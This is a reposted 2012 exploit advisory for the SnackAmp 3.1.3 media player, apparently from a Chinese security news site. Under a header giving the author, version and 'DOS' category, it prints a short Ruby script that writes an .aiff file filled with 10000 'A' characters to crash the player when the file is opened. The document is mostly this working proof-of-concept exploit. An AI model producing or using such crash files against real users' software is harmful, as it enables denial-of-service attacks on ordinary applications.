SnackAmp 3.1.3 Malicious aiff File Denial of service
|
来源:ahmed.elhady.mohamed@gmail.com 作者:Mohamed 发布时间:2012-04-05
|
|
SnackAmp 3.1.3 Malicious aiff File Denial of service =================================================================================== # Exploit Title:SnackAmp 3.1.3 Malicious aiff File Denial of service # Download link :http://sourceforge.net/projects/snackamp/ # Author: Ahmed Elhady Mohamed # Email : ahmed.elhady.mohamed@gmail.com # version: 3.1.3 # Category: DOS # Tested on: ubuntu 11.4 =================================================================================== File.open "crash1.aiff" , "w" do |file| buffer = "A" * 10000 file.puts buffer end
|
|
|
[推荐]
[评论(0条)]
[返回顶部] [打印本页]
[关闭窗口] |
|
|